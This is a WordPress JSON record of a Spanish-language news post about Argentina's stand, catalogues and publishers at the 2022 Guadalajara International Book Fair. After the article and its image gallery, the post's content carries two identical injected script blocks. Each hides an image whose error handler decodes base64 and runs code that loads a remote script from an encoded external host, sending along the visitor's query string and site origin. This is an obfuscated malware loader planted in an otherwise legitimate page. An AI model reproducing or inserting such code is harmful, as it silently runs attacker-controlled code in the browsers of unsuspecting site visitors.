{"id":1851,"date":"2022-11-25T11:41:53","date_gmt":"2022-11-25T14:41:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1851"},"modified":"2025-08-14T00:29:22","modified_gmt":"2025-08-14T03:29:22","slug":"argentina-se-presenta-en-la-feria-internacional-del-libro-de-guadalajara-2022","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1851","title":{"rendered":"Argentina se presenta en la Feria Internacional del Libro de Guadalajara 2022"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#034165\"><em>Ma\u00f1ana, 26 de noviembre, en la ciudad de Guadalajara, M\u00e9xico, se llevar\u00e1 a cabo la ceremonia de apertura de la\u00a0<strong>Feria Internacional del Libro de Guadalajara,\u00a0<\/strong>evento que este a\u00f1o conmemora su 36\u00b0 edici\u00f3n y es una de las ferias m\u00e1s importantes de la industria editorial hispana y la actividad de promoci\u00f3n con mayor participaci\u00f3n de editoriales argentinas.<\/em><\/h5>\n\n\n\n<p>L<strong>a Canciller\u00eda argentina, al igual que en la Feria Internacional del Libro de Frankfurt, vuelve a presentar un su stand una importante muestra de libros que corresponden a los programas e iniciativas que forman parte del Plan Libro Argentino<\/strong>, pol\u00edtica p\u00fablica impulsada por la Direcci\u00f3n de Asuntos Culturales, junto a la Direcci\u00f3n Nacional de Turismo, Deportes, Industrias Culturales y Creativas y Servicios Basados en el Conocimiento, y la Agencia Argentina de Inversiones y Comercio Internacional del Ministerio de Relaciones Exteriores, Comercio Internacional y Culto.&nbsp;<\/p>\n\n\n\n<p>La presencia en este tipo de eventos busca<strong>&nbsp;la internacionalizaci\u00f3n del mercado editorial nacional a partir del impulso de las publicaciones y de sus autores y autoras en el exterior<\/strong>. Esta proyecci\u00f3n persigue, adem\u00e1s, el desarrollo econ\u00f3mico exportador y la profesionalizaci\u00f3n de medianas y peque\u00f1as editoriales, tanto en relaci\u00f3n al mercado de derechos como al libro f\u00edsico.<\/p>\n\n\n\n<p><strong>En el stand de Argentina se pueden encontrar los 300 libros que corresponden a la curadur\u00eda Argentina Bibliodiversa<\/strong>, un cat\u00e1logo elaborado a partir de una convocatoria abierta de la que participaron m\u00e1s de 100 editoriales y realizada especialmente para las ferias internacionales de Frankfurt y Guadalajara. Este cat\u00e1logo, que est\u00e1 disponible de manera f\u00edsica en el stand y en su versi\u00f3n digital en la p\u00e1gina web de canciller\u00eda, exhibe la diversidad de nuestra industria editorial y la calidad de sus contenidos en distintos ejes: Literatura y diversidad, G\u00e9neros m\u00faltiples, Ediciones universitarias y Traducciones argentinas.<\/p>\n\n\n\n<p>Adem\u00e1s,<strong>&nbsp;el lunes 28 de noviembre, se celebrar\u00e1 el D\u00eda del Libro Argentino<\/strong>. En este marco,&nbsp;<strong>se inaugurar\u00e1 el stand de nuestro pa\u00eds y se realizar\u00e1 la presentaci\u00f3n del Plan Libro Argentino y de las diferentes iniciativas que engloba y que son llevadas adelante por la Canciller\u00eda argentina.<\/strong><\/p>\n\n\n\n<p>Tambi\u00e9n, el stand alberga una selecci\u00f3n de libros del&nbsp;<strong>Programa Sur<\/strong>, un programa que brinda apoyo econ\u00f3mico para la traducci\u00f3n de obras argentinas a otras lenguas; el cat\u00e1logo<strong>&nbsp;Argentina Key Titles<\/strong>, una selecci\u00f3n de 28 t\u00edtulos argentinos creado con el objetivo de promover la venta de derechos; y una vitrina dedicada<strong>&nbsp;autoras y autores premiados, con una selecci\u00f3n de 30 escritoras y escritores<\/strong>&nbsp;que recibieron importantes reconocimientos internacionales.&nbsp;<\/p>\n\n\n\n<p>Por otro lado, se destaca la participaci\u00f3n en la Feria del escritor<strong>&nbsp;Sergio Olgu\u00edn y las escritoras Fernanda Garc\u00eda Lao y Ariana Harwicz, que contaron con el apoyo de la Canciller\u00eda para su traslado, as\u00ed como tambi\u00e9n lo recibieron las editoriales Quipu, La marca editora, Los r\u00edos editorial, Compa\u00f1\u00eda naviera y Hotel de las ideas<\/strong>, que se suman a Nobuko, Eudeba, SB Editorial, Editorial Brujas, Nicol\u00e1s Von Der Pahlen, Letras del Sur, Librer\u00eda Akadia Editorial, Ediciones Journal, Valletta Ediciones, Waldhuter, Editorial Imaginador, Ecoval Ediciones, Corpus Libros, Riderchail, Del Naranjo, Claretiana, AZ Editora, Nazhira, Vestales, Interzona Editora, Grupal Distribuidora, Kier, Heliasta, y Bonum que estar\u00e1n presentes en el stand de nuestro pa\u00eds.<\/p>\n\n\n\n<p>En palabras de Germ\u00e1n Marcelo Ferrero, Director de Editorial Brujas, \u00abes muy importante el apoyo que la Canciller\u00eda, a trav\u00e9s de la AAICI, ha realizado para lograr nuestra participaci\u00f3n en la FIL Guadalajara. Y no solo me refiero a la log\u00edstica, sino al compromiso que asume para que las PyMEs podamos seguir desarroll\u00e1ndonos\u00bb.&nbsp;<\/p>\n\n\n\n<p>Actualmente, Argentina es el 64 exportador del sector editorial a nivel mundial siendo Chile, Uruguay, Per\u00fa y Bolivia los principales destinos de los env\u00edos argentinos que agrupan el 62,7% de las ventas externas del sector (Fuente: TradeMap). De hecho, acorde a estad\u00edsticas publicadas en el Informe de Producci\u00f3n del libro 2021, el Sector Editorial Comercial (SEC) observ\u00f3 un crecimiento en la cantidad de empresas participantes en 2021: se alcanz\u00f3 el monto de 347 razones sociales que, en conjunto, editaron 11.603 novedades. En este mismo per\u00edodo, el comercio exterior del libro mostr\u00f3 una leve recuperaci\u00f3n, con ventas externas por US$ 21,3 millones contra US$ 18 millones en 2020.<\/p>\n\n\n\n<p>El cat\u00e1logo Argentina Bibliodiversa se puede encontrar en:&nbsp;<a href=\"https:\/\/www.cancilleria.gob.ar\/userfiles\/ut\/catalogo_web.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.cancilleria.gob.ar\/userfiles\/ut\/catalogo_web.pdf<\/a><\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n sobre el Plan Libro Argentino, Argentina Bibliodiversa, Programa SUR y Argentina Key Titles en:\u00a0\u00a0<a href=\"https:\/\/www.cancilleria.gob.ar\/libro-argentino\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cancilleria.gob.ar\/libro-argentino<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"1852\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-1024x682.jpg\" alt=\"\" class=\"wp-image-1852\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-1024x682.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada_2.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"1853\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-1024x682.jpg\" alt=\"\" class=\"wp-image-1853\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-1024x682.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/guada1.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana, 26 de noviembre, en la ciudad de Guadalajara, M\u00e9xico, se llevar\u00e1 a cabo la ceremonia de apertura de la\u00a0Feria Internacional del Libro de Guadalajara,\u00a0evento que este a\u00f1o conmemora su 36\u00b0 edici\u00f3n y es una de las ferias m\u00e1s importantes de la industria editorial hispana y la actividad de promoci\u00f3n con mayor participaci\u00f3n de editoriales [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1853,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-1851","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1851"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1851"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1851\/revisions"}],"predecessor-version":[{"id":7263,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1851\/revisions\/7263"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1853"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}